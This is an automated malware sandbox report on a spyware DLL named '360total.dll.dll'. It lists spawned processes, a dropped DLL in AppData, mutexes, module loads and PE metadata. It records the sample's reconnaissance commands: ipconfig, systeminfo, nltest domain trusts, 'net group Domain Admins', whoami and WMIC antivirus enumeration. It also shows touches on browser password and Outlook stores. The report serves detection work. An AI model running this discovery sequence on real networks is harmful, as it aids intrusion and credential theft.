Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B581D834 8_3_000001E3B581D834
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5847874 8_3_000001E3B5847874
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B586B370 8_3_000001E3B586B370
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6358 8_3_000001E3B57E6358
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EE31C 8_3_000001E3B57EE31C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583318C 8_3_000001E3B583318C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57FD19C 8_3_000001E3B57FD19C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58151C0 8_3_000001E3B58151C0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58411CC 8_3_000001E3B58411CC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58251F8 8_3_000001E3B58251F8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58101FB 8_3_000001E3B58101FB
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5855534 8_3_000001E3B5855534
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5800540 8_3_000001E3B5800540
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5843498 8_3_000001E3B5843498
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E8568 8_3_000001E3B57E8568
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B582F4C4 8_3_000001E3B582F4C4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58484D8 8_3_000001E3B58484D8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58694F0 8_3_000001E3B58694F0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5852430 8_3_000001E3B5852430
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5837448 8_3_000001E3B5837448
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583E45C 8_3_000001E3B583E45C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58573A0 8_3_000001E3B58573A0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58283EC 8_3_000001E3B58283EC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B585AF20 8_3_000001E3B585AF20
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EBEB8 8_3_000001E3B57EBEB8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5829F68 8_3_000001E3B5829F68
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B587AE84 8_3_000001E3B587AE84
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5870EC0 8_3_000001E3B5870EC0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5841ECC 8_3_000001E3B5841ECC
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5837EE8 8_3_000001E3B5837EE8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57FFE38 8_3_000001E3B57FFE38
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5809D94 8_3_000001E3B5809D94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5879D94 8_3_000001E3B5879D94
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5838DF8 8_3_000001E3B5838DF8
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5840114 8_3_000001E3B5840114
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5854134 8_3_000001E3B5854134
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5850154 8_3_000001E3B5850154
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B58270C0 8_3_000001E3B58270C0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B583F018 8_3_000001E3B583F018
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E7FD0 8_3_000001E3B57E7FD0
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B5806038 8_3_000001E3B5806038
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B584A048 8_3_000001E3B584A048
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B581E074 8_3_000001E3B581E074
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6078 8_3_000001E3B57E6078
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 3_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018008395A
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle, 3_2_000000018004B780
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800072A8 CoCreateInstance, 3_2_00000001800072A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free, 3_2_000000018003A8D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\Uhad32.tmp
Source: 360total.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, 00000008.00000003.3370598400.000001E3B564C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5636000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5648000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 360total.dll.dll ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: Slides.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 360total.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Source: Update_27361bf8.dll.4.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.dll Static PE information: real checksum: 0xd8785 should be: 0xe745c
